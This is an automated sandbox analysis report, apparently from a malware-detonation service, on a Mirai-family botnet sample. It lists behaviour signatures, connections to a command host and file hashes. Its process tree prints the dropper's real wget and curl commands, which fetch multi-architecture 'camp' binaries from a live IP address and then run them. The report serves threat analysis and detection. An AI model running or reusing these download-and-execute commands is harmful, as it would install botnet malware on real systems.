| SHA512 | 1157694bf541b030139adfc760dacee62d39d45970d958a60177b1068320a9f3501971a7b745788f99024b757e81b4304b3ff7c1c4eeb76cd194c4f681db07f2 |
memory/842-1-0x00400000-0x0045af60-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 08:32
Reported
2024-11-09 08:34
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
139s
Max time network
150s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
| N/A | /tmp/Chaotic | /tmp/Chaotic | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /dev/watchdog | /tmp/Chaotic | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /bin/watchdog | /tmp/Chaotic | N/A |
| File opened for modification | /sbin/watchdog | /tmp/Chaotic | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/85/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/11/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/902/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1532/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1484/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1564/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1145/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/5/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1169/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/22/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1479/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/27/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1234/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1126/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/79/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/451/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1480/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/270/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/433/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1145/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1087/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/548/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/645/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1017/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1141/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1159/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1158/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1214/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/473/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1484/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1163/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1139/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1064/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1530/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/31/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1037/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/760/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1311/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1017/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/980/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/35/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/160/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/78/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/437/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1237/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1136/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/28/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/9/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/434/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/434/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1479/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1171/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/6/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/17/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/985/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/539/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/162/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/3/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1183/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1050/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/1522/status | /tmp/Chaotic | N/A |
| File opened for reading | /proc/660/status | /tmp/Chaotic | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/camp.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/busybox | /bin/cp | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/Chaotic | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/camp.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.sparc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/camp.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/camp.arm5 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/bin/cp
[cp /bin/busybox /tmp/]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arc]
/bin/cat
[cat camp.arc]
/bin/chmod
[chmod +x busybox camp.arc Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86]
/bin/cat
[cat camp.x86]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.x86_64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.x86_64]
/bin/chmod
[chmod +x busybox camp.arc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.i686]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.i686]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mips64]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mips64]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-qmzLJ2]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.mpsl]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.mpsl]
/bin/chmod
[chmod +x busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm5]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm5]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm6]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm6]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.arm7]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.arm7]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.ppc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.ppc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sparc]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sparc]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.m68k]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.m68k]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
/usr/bin/wget
[wget http://198.12.107.126/bins/camp.sh4]
/usr/bin/curl
[curl -O http://198.12.107.126/bins/camp.sh4]
/bin/chmod
[chmod +x busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic config-err-PU8zzp netplan_ot4kxa4r ohshit.sh snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9]
/tmp/Chaotic
[./Chaotic]
Network
| Country | Destination | Domain | Proto |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 185.125.188.61:443 | N/A | tcp |
| GB | 185.125.188.61:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| GB | 195.181.164.17:443 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:80 | 198.12.107.126 | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
| US | 198.12.107.126:3778 | N/A | tcp |
Files
/tmp/busybox
| MD5 | b4dede5fc0b1bad5cb8e901bde126b97 |
| SHA1 | 10cbe9a418ad84a1ed297948539d37aeb58dd810 |
| SHA256 | a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020 |
| SHA512 | 45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6 |
/tmp/camp.arc
| MD5 | 36a7a1e959eaf7d6896505777912ecdf |
| SHA1 | 4f9a1f8cc82036f0ffb90c6dc1c5093bca499919 |
| SHA256 | 5111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca |
| SHA512 | 77acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0 |
/tmp/Chaotic
| MD5 | dac9f1dcafdb77db0d0ff1be1e704b1e |
| SHA1 | e83605a050e0aaad3dba360545a00036f083eb91 |
| SHA256 | 7fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d |
| SHA512 | e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571 |
memory/1507-1-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1517-2-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1527-3-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1537-4-0x0000000008048000-0x000000000805bc40-memory.dmp
memory/1547-5-0x0000000008048000-0x000000000805bc40-memory.dmp
